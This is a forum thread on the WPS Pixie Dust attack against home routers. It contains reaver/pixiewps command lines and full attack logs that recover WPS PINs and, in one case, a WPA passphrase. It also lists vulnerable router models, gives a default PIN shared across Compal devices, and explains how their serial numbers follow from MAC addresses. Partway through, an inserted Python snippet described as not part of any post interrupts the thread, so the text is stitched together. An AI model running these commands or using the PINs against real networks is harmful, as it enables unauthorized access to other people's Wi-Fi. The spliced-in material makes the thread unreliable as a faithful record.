
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #1
    Join Date
    2013-Jul
    Posts
    844
    Pixie Dust Data Types and successful WPS pin extraction.

    There are two (2) types of Pixie Dust data sequences:

    When --dh-small is used in the reaver command line, the -PKR sequence is fixed and not variable.

    When --dh-small is not used, the -PKR variable constantly changes.

    Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key, while the same reaver command line without --dh-small (thus with a variable -PKR) provided data that DID extract the WPS Key.

    MTeams suggest that if you run a --dh-small attack and do not acquire the WPS key from the data, remove the --dh-small from the reaver command line, collect some more Pixie Dust data sequences with a variable -PKR and try again.


    MTeams Labs

  2. #2
    Quote Originally Posted by mmusket33 View Post
    Pixie Dust Data Types and successful WPS pin extraction.
    Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key, while the same reaver command line without --dh-small (thus with a variable -PKR) provided data that DID extract the WPS Key.
    I just want to point out that the tool is not completed yet; it works only (for Realtek) if the 3 nonces are generated within THE SAME second. So we can't be sure whether --dh-small causes bugs. I think you should try to supply the right pin with Reaver to the AP using --dh-small. If it works and the AP goes past the M3, then it should mean that it works with --dh-small too (unless there's a bug in my code lol).

  3. #3
    Join Date
    2013-Jul
    Posts
    844
    To wiire


    Further PKR corrections when using --dh-small in the reaver command line

    Musket Teams noticed that the PKR variable, when --dh-small is employed in the reaver command line, should normally be a long series of zeros ending with :02. Total string length is 575. However, in all the output provided by the modded reaver, the PKR variable when dh-small is used shows the 02 at the beginning of the string and the key is never found.

    MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

    In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

    Musket Teams Labs

  4. #4
    Quote Originally Posted by mmusket33 View Post
    To wiire


    Further PKR corrections when using --dh-small in the reaver command line

    Musket Teams noticed that the PKR variable, when --dh-small is employed in the reaver command line, should normally be a long series of zeros ending with :02. Total string length is 575. However, in all the output provided by the modded reaver, the PKR variable when dh-small is used shows the 02 at the beginning of the string and the key is never found.

    MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

    In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

    Musket Teams Labs
    PKr gets printed in little-endian when using small keys (only). When adding the lines of code to print PKr I didn't test with -S, oops. If you sniff the traffic with Wireshark you see it's OK. BTW if you use pixiewps with small keys (-S) the program will automatically set PKr = 2 (00: ... :02).

    That's because with small keys Reaver sets its private number = 1. Thus: g^A mod P = 2^1 mod P = 2 (P is a huge prime number > 2).

    Anyway, now the recommended version of Reaver is the one made and maintained by t6_x and datahead (which prints it right). I updated the link to my original post.
    Last edited by wiire; 2015-04-21 at 14:16.
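
The PKR arithmetic and print-order issue discussed in posts #3 and #4, as an added example that is not part of any post and is not code from Reaver or pixiewps: it classifies a printed PKR value as the fixed small-key value, the same value printed byte-reversed, or a variable key. The function names, the sample log lines and the stand-in modulus are assumptions; the 192-byte width is derived from the 575-character string length quoted in the thread.

```python
# Added example (not from Reaver or pixiewps): classify a printed PKR value.
# All names and the sample log lines below are constructed for illustration.
import re

PKR_STRING_LEN = 575                     # string length quoted in the thread
PKR_BYTES = (PKR_STRING_LEN + 1) // 3    # "xx:" per byte, no trailing colon -> 192
GENERATOR = 2                            # g in "g^A mod P"

# Stand-in modulus (assumption): NOT the real WPS prime. For A = 1 any P > 2
# gives the same result, which is the point made in post #4.
STAND_IN_MODULUS = (1 << (PKR_BYTES * 8)) - 1

COLON_HEX = re.compile(r"[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2})*")


def small_key_public(private=1, modulus=STAND_IN_MODULUS):
    """Return g^A mod P as a fixed-width big-endian byte string."""
    return pow(GENERATOR, private, modulus).to_bytes(PKR_BYTES, "big")


def to_colon_hex(raw):
    """Format bytes the way the [P] lines print them: aa:bb:cc..."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_colon_hex(text):
    """Parse aa:bb:cc... into bytes, rejecting anything malformed."""
    text = text.strip()
    if not COLON_HEX.fullmatch(text):
        raise ValueError("not a colon-separated hex string")
    return bytes.fromhex(text.replace(":", ""))


def classify_pkr(text):
    """Classify one printed PKR value.

    'small-key'          -> 00:...:02, i.e. private number 1 (2^1 mod P = 2)
    'small-key-reversed' -> 02:00:...:00, the same value printed little-endian
    'variable'           -> anything else of the right width
    """
    raw = parse_colon_hex(text)
    if len(raw) != PKR_BYTES:
        raise ValueError(f"expected {PKR_BYTES} bytes, got {len(raw)}")
    expected = small_key_public()
    if raw == expected:
        return "small-key"
    if raw[::-1] == expected:
        return "small-key-reversed"
    return "variable"


def scan_log(lines):
    """Return the classification of every '[P] PKR:' line, in order."""
    results = []
    for line in lines:
        line = line.strip()
        if line.startswith("[P] PKR:"):
            results.append(classify_pkr(line.split(":", 1)[1]))
    return results


# Constructed sample input: one correct small-key print, one byte-reversed
# print, and one arbitrary 192-byte value standing in for a variable key.
SAMPLE_LOG = [
    "[P] E-Nonce: (omitted)",
    "[P] PKR: " + to_colon_hex(small_key_public()),
    "[P] PKR: " + to_colon_hex(small_key_public()[::-1]),
    "[P] PKR: " + to_colon_hex(bytes((7 * i + 3) % 256 for i in range(PKR_BYTES))),
]

if __name__ == "__main__":
    for verdict in scan_log(SAMPLE_LOG):
        print(verdict)
```

A registrar public key equal to 2 means the private number was 1, so the same check works on the registrar public key field of a captured M2 message to tell whether small keys were in use.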

  5. #5
    uhm, anyone had any luck with atheros chipsets yet?

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by wn722 View Post
    uhm, anyone had any luck with atheros chipsets yet?
    I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.

  7. #7
    Quote Originally Posted by soxrok2212 View Post
    I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.
    Hi soxrox,

    I have some TP-LINK RTL 8671 EV 2006 07 27 Realtek chipset modem information (modem pictures, eap-eapol cap files).

    I can send them to you... Maybe you can use them for analysis...

    TP-LINK generally uses this chipset...

    send me an email...

    thanks..

  8. #8
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Saydamination View Post
    Hi soxrox,

    I have some TP-LINK RTL 8671 EV 2006 07 27 Realtek chipset modem information (modem pictures, eap-eapol cap files).

    I can send them to you... Maybe you can use them for analysis...

    TP-LINK generally uses this chipset...

    send me an email...

    thanks..
    My e-mail is my username @gmail.com

  9. #9
    Quote Originally Posted by soxrok2212 View Post
    My e-mail is my username @gmail.com
    Hi soxrok ,

    I sent an e-mail ...

    good luck

  10. #10
    Join Date
    2015-Apr
    Posts
    15
    some updates for the database ;-)


    Compal CH6640E
    Realtek RTL8192CE

    After successful PIN-Test reaver brings for PSK + SSID "(null)"?
    So, what else, it's some kind of VULNERABLE.


    NOT VULNERABLE:

    TP-LINK TL-WR740n v1/v2
    Broadcom BCM5356


    NOT VULNERABLE:

    Belkin F7D1301 v1
    Broadcom BCM5356A1



    NOT VULNERABLE:

    ASUS RT-AC66U
    Broadcom BCM4706



  11. #11
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Sweet thanks! Just updated everything.. should be all set

  12. #12
    Join Date
    2014-Nov
    Posts
    8
    Not vulnerable:

    ZyXEL VMG3312-B10A
    [P] WPS Manufacturer: ZyXEL
    [P] WPS Model Number: VMG3312-B10A
    [P] WPS Model Serial Number: 96368GW

    Last edited by SubZero5; 2015-04-22 at 08:47.

  13. #13
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by SubZero5 View Post
    ZyXEL VMG3312-B10A
    [P] WPS Manufacturer: ZyXEL
    [P] WPS Model Number: VMG3312-B10A
    [P] WPS Model Serial Number: 96368GW
    Awesome thanks
    Last edited by soxrok2212; 2015-04-22 at 13:35.

  14. #14
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by someone_else View Post
    some updates for the database ;-)


    Compal CH6640E
    Realtek RTL8192CE

    After successful PIN-Test reaver brings for PSK + SSID "(null)"?
    So, what else, it's some kind of VULNERABLE.

    @Soxrok2212
    Some information about the Compal device. Tested with 8 devices; each of them has the same PIN 47385580, which leads (with friendly help from Bully) to the correct WPA2 key (which was different in all 8 cases).

  15. #15
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully, please.

  16. #16
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by soxrok2212 View Post
    Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully, please.
    Hi,
    I checked three of them; each one has 47385580 as the default PIN in the WPS settings.
    For 7 models, Reaver gives PSK + SSID "(null)"; only one shows SSID and PSK. Bully delivers both values correctly.
    Btw: in your Pixie database a second Compal device is listed (CBN-106-145-065). That CBN-xxx-xxx-xxx number is different on each router I've tested. So it's probably the same model.

    Here are 5 of them:

    Last edited by someone_else; 2015-04-25 at 12:32.

  17. #17
    Join Date
    2015-Apr
    Posts
    15
    @ soxrok

    please update the Chipset from Hitron CVE30360. The correct one is RT 3352F

    And a new one for the Database:

    NOT VULNERABLE:

    TP-LINK TL-WDR3500
    Atheros AR9340 / 2.4GHz
    Atheros AR9300 / 5GHz



  18. #18
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by someone_else View Post
    @ soxrok

    please update the Chipset from Hitron CVE30360. The correct one is RT 3352F

    And a new one for the Database:

    NOT VULNERABLE:

    TP-LINK TL-WDR3500
    Atheros AR9340 / 2.4GHz
    Atheros AR9300 / 5GHz


    Whoops... thanks!

  19. #19
    Join Date
    2015-Apr
    Posts
    5
    Hi soxrok2212, what about the Technicolor TD5130? Is there any method to crack it?

  20. #20
    Join Date
    2015-Apr
    Posts
    9
    Your new version works on TD5130 v2, but not on TD5130 v1. I will wait for a new video for all Realtek chipsets.

  21. #21
    Join Date
    2015-Apr
    Posts
    1
    I had no success with this AP. Do you need me to gather any more information?


  22. #22
    Join Date
    2015-Mar
    Posts
    19
    Doesn't work on the UK TalkTalk Super Router
    Broadcom chipset, Huawei model

  23. #23
    Join Date
    2015-Apr
    Posts
    4
    I confirm it's working on Technicolor TD5130 v2... :

    Code:
    wifislax ~ # reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -K 3 -P
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from A6:25:89:XX:XX:XX
    [+] Associated with A6:25:89:XX:XX:XX (ESSID: TNCAPxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Number: EV-2010-09-20
    [P] Access Point Serial Number: 123456789012347
    [P] PKR: 44:7c:98:9e:94:47:e5:bc:22:0e:4f:b9:19:86:18:3a:35:e9:70:8c:6d:97:a3:81:53:08:1b:22:4c:4a:fd:0a:2a:a0:b9:37:de:31:86:2f:63:a1:2c:75:35:10:d9:2b:e3:8f:b7:6b:57:c9:58:fd:e8:0e:bf:87:44:08:23:84:ca:85:ec:2d:53:f3:27:cd:d5:a5:e7:93:9f:3a:7a:66:d3:c4:f1:eb:d4:e9:6c:60:ce:63:12:bc:ac:04:1e:ca:fd:ab:cf:b0:a4:d3:ad:39:f5:bd:1e:b2:c1:93:34:9d:b7:8b:cc:98:c9:3e:90:d6:08:c0:08:18:51:d3:ff:5f:6a:a5:32:a5:d3:5f:7d:48:bb:4f:f1:bc:eb:ac:95:22:8f:da:e3:a2:46:b9:52:3c:ff:95:db:95:a9:0c:28:30:f8:68:97:9a:a7:66:02:9c:11:da:ab:3d:7d:b7:30:ab:a8:69:c5:07:f5:da:da:e3:3b:36:7e:f0:97:80:7b:27
    [P] AuthKey: 04:b8:0b:ef:4b:f1:12:76:23:39:2d:f6:32:bb:c3:57:15:45:17:c9:46:e3:a0:3b:44:80:2e:83:16:d8:1e:22
    [P] E-Hash1: e6:0e:1b:5f:e2:f1:bc:eb:1e:f7:c4:1d:69:97:3a:ea:3b:81:25:aa:64:4a:23:11:cb:cd:52:8e:c3:78:39:9a
    [P] E-Hash2: b9:f4:db:b2:08:1b:31:43:6e:70:9f:ca:cb:4d:bb:5d:0a:fc:86:5b:a4:76:33:e6:e0:cd:1b:b9:05:2f:d1:ce
    [Pixie-Dust]  
    [Pixie-Dust][*] ES-1: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
    [Pixie-Dust][*] ES-2: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
    [Pixie-Dust][*] PSK1: 49:40:f7:f2:af:67:5a:50:81:12:b6:27:82:2f:35:3b
    [Pixie-Dust][*] PSK2: d7:c0:5c:8d:60:9a:a6:cc:c0:fe:9e:6c:36:77:04:84
    [Pixie-Dust]   [+] WPS pin: 99280710
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]  
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -s y -p 99280710
    
    [Reaver Test] BSSID: A6:25:89:XX:XX:XX
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '99280710'
    [Reaver Test] [+] WPA PSK: '18D189E728'
    [Reaver Test] [+] AP SSID: 'TNCAPxxxxxx'
    ..But not on TD5130 v1 :

    Code:
    wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from 00:18:E7:XX:XX:XX
    [+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1209A1D12783
    [P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c:3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78:f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37:ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17:a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b:6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3:a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc:c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:ee:70:4b:de:26:8a:21:6c:99
    [P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c:b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
    [P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1209A1D12783
    [P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1:9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e:18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23:72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa:3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e:e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:00:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90:31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15:dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:ed:3c:8d:d9:17:3e:ca:22:62
    [P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f:8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
    [P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0:15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
    [P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf:c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    So we're waiting for a new update of Pixie, and I hope it'll be very soon...

  24. #24
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by unsuns06 View Post
    I confirm it's working on Technicolor TD5130 v2... :

    ..But not on TD5130 v1 :

    So we're waiting for a new update of Pixie, and I hope it'll be very soon...
    Try this PIN: 76757891

  25. #25
    Join Date
    2015-Apr
    Posts
    4
    How did you get this PIN ?

    I will try it later this week because I'm travelling right now.

    Thank you.

  26. #26
    Join Date
    2015-Apr
    Posts
    4
    Quote Originally Posted by soxrok2212 View Post
    Try this PIN: 76757891
    IT'S THE 3RD TIME I TRY TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

    How did you get this PIN ?

    I'll try it later this week, because I'm travelling right now.

    When will the new update of pixie be released ?

    Many thanks.

  27. #27
    pixiewps isn't installing.
    It shows a problem in line 46:26.
    After that it also halts on the 'SHA1' line.
    Any way to solve it?
    I'm running Kali live.

  28. #28
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Alright thanks... there was no other pin listed?

  29. #29
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by soxrok2212 View Post
    Alright thanks... there was no other pin listed?
    Nope. I don't know if this is ISP/country specific, but (again) all tested routers have the same PIN.

    Here is the User-Manual, the WPS Menu is described on page 50.

  30. #30
    .

    Now, I have some information about the F8:1A:67:XX:XX:XX MAC address (RTL 8671 ev 2006 07 27 chipset of TPLINK modems).

    These MAC addresses are masked... F8:1A:67 is the mask, FA:1A:67 is the original MAC.
    Last edited by Saydamination; 2015-04-25 at 15:41. Reason: other reasons

  31. #31
    if it's any use for anyone

    TP-LINK TL-WR841ND v8.x
    WI1 chip1: Atheros AR9341

    Code:
    [P] E-Nonce: b0:74:6b:86:dd:ed:47:b7:63:2b:4c:12:12:d5:c1:4e
    [P] PKE: cb:8b:ce:5a:3e:49:e1:f6:02:75:c2:cb:c4:cd:bb:48:1e:a0:e8:ea:95:85:c3:62:6c:c1:ec:e3:58:01:54:8b:55:f2:34:59:34:4a:3d:22:26:44:76:42:60:b8:a2:41:40:38:db:17:b1:0d:92:81:f5:c2:31:b4:d9:b1:50:41:70:5b:ce:58:34:3c:83:7a:99:26:66:da:be:6b:ab:87:45:ea:2a:b3:11:9a:b0:de:73:df:9f:65:24:3d:75:cd:f7:63:8a:d7:9f:21:ae:60:63:fd:1c:0a:62:e1:6c:63:cc:4a:63:1a:aa:e3:28:c5:88:d7:7e:49:53:1b:be:7a:2c:d7:2c:1b:bf:72:74:29:3e:5a:77:e7:ad:55:bd:84:6b:dd:0a:56:81:ce:e4:10:d0:ab:16:9a:2a:f8:bc:92:52:30:4f:f1:74:9e:48:fd:2e:ea:01:de:f9:96:3d:75:67:c5:74:53:c2:37:06:13:8e:5f:c5:59:15:28:15:dc
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 8.0
    [P] WPS Model Serial Number: 1.0
    [+] Received M1 message
    [P] PKR: 5c:a1:2f:f5:aa:4f:24:c2:c4:9b:b1:75:23:0b:66:63:50:d0:d3:33:7e:6d:28:01:1d:13:e4:04:d6:22:1b:a8:51:d9:33:fe:26:a6:00:f2:b0:b6:ef:fd:ea:8f:00:f9:23:ac:4a:a1:ec:ad:86:56:cf:62:2d:ea:74:f6:02:47:5f:e2:05:1c:19:2b:26:e0:33:fb:aa:3e:cc:e7:5f:4e:5f:f1:4f:c6:ff:71:ef:79:e1:ae:df:9c:4e:44:15:16:90:09:88:ba:0c:86:8e:87:12:13:d9:f6:ca:ac:d8:2b:be:41:8f:56:59:1b:12:22:16:e0:17:69:ee:9c:ce:c8:e4:b7:ca:1f:9c:71:8f:b0:2f:0e:c2:7d:80:41:ec:ed:d5:7c:d1:e8:0f:1d:36:0d:19:48:f1:71:e8:51:d4:31:87:d4:25:47:d9:2b:05:a6:44:0e:19:8c:fa:a9:96:3e:78:95:65:16:87:b3:7f:98:92:da:15:9c:5f:f5:44:f2
    [P] AuthKey: 6d:ad:39:70:41:85:d1:99:b2:c2:be:62:67:7b:2e:cb:be:ff:b2:d1:23:e3:63:0a:fb:1d:6c:75:ad:9b:82:84
    [+] Sending M2 message
    [P] E-Hash1: 3b:1c:a3:7d:df:eb:90:b0:af:20:bd:72:82:6a:ab:01:3e:93:39:22:10:ff:a2:07:59:c3:ba:00:31:3a:3c:f5
    [P] E-Hash2: ae:a5:9e:bc:13:53:aa:ce:7f:38:27:50:33:72:1a:c7:53:17:a1:59:12:57:e2:df:95:23:a0:4c:80:09:16:cd
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s

  32. #32
    Zyxel Keenetic vulnerable
    unknown chipset

    Code:
    [P] E-Nonce: 18:31:5b:b2:69:e3:1a:c1:55:8f:e5:6d:7d:41:9b:3b
    [P] PKE: 71:51:cd:92:d8:61:05:50:1e:15:15:6b:f1:a9:d8:5b:49:cf:a0:9e:9d:00:2a:7a:21:91:94:0e:ac:15:d3:44:58:2f:c8:61:3d:ce:f8:48:da:f6:ff:68:c2:8b:b5:20:61:e1:5d:8c:f2:57:60:a7:8f:3a:32:bf:69:5f:24:cc:e4:70:33:7f:12:3d:c6:88:02:ea:78:6b:9d:64:3f:b0:9d:68:65:e4:25:4e:e3:26:ab:73:ae:ea:b2:1c:6d:c6:b9:99:e0:7c:ea:18:56:3a:86:90:6e:78:a6:ea:6c:f6:6e:04:96:39:ef:04:2e:30:bc:96:c6:9f:1d:50:eb:82:a8:77:b6:b0:7b:43:bc:a6:57:75:62:93:64:7e:15:9d:14:96:e2:4c:9e:3c:71:31:ad:b9:e6:f5:5e:fe:98:85:ab:9e:3c:b3:d4:4d:5b:76:b6:f0:74:7b:ca:8c:d7:45:cc:b3:e6:93:a8:43:f8:1b:aa:f2:8c:35:47:68:cc:1b
    [P] WPS Manufacturer: ZyXEL Communications Corp.
    [P] WPS Model Number: KEENETIC series
    [P] WPS Model Serial Number: none
    [+] Received M1 message
    [P] PKR: 62:dd:72:61:8b:fe:85:22:81:e5:2f:33:0f:e7:07:c3:a1:97:62:d7:69:7a:7d:dd:c6:1d:af:cf:f4:b5:83:31:42:6a:21:69:ec:d5:0a:15:16:ee:76:bf:9f:a7:fb:01:dd:64:ee:c7:42:41:f9:25:dd:ee:2c:88:9a:1e:3e:fa:a1:bb:97:8d:4a:33:25:d4:ff:f1:83:93:fe:98:c8:6a:90:2a:b0:f3:76:aa:6a:31:d5:18:16:dd:75:93:b9:e3:b9:39:4e:c8:ce:01:82:58:14:30:d8:92:af:6d:b4:69:29:ec:4b:52:e7:83:5c:3d:ae:a8:73:38:55:ac:87:76:85:c3:e8:8e:bd:ff:d9:b0:c1:3b:06:37:89:6e:ec:2b:75:24:1f:89:56:6d:79:27:9f:c9:02:00:32:b7:71:cf:ec:08:af:bc:ff:46:1f:aa:7d:c6:d6:bf:8d:b0:d2:ac:a9:02:ba:88:45:69:fc:81:fb:59:eb:15:bb:4a:23:44
    [P] AuthKey: 9d:25:78:e1:27:48:12:fa:97:5f:aa:6f:3a:68:d2:86:3f:62:ec:c7:51:a1:df:02:87:f9:48:fd:56:fc:67:08
    [+] Sending M2 message
    [+] Received M1 message
    [P] E-Hash1: 3e:08:b5:6b:9b:bd:cd:2e:07:b6:0b:76:ba:99:97:1a:f4:d9:38:11:09:f4:af:8c:3c:cd:dd:19:94:d7:b4:a7
    [P] E-Hash2: c4:39:a8:b6:3b:67:80:32:0f:1c:62:f7:40:d8:4d:85:9f:02:e7:fc:5a:4a:85:a6:e8:8f:5b:0d:aa:55:b0:09
    [Pixie-Dust]  
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11
    [Pixie-Dust][*] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31
    [Pixie-Dust]   [+] WPS pin: 19048185

  33. #33
    Join Date
    2015-Apr
    Posts
    15
    Sorry for the off-topic, I've got further information about Compal:

    MAC-Address 5C:35:3B:xx:xx:xx
    cbn–zyy–xxx-xxx
    Serial-Number: NNNNNxxxxxxxxx
    In my 8 cases, "N" is 53059. (Convert this number (with leading zero) to hex and you get 353B, part of the MAC address.)
    The other 9 numbers "x" are the last 6 letters from the MAC address in decimal.
    And cbn should be something like "Compal Broadband Network".

    Later yesterday I got two Compal models with MAC address (DC:53:7C); each of them has a different PIN:


    Code:
    [P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43
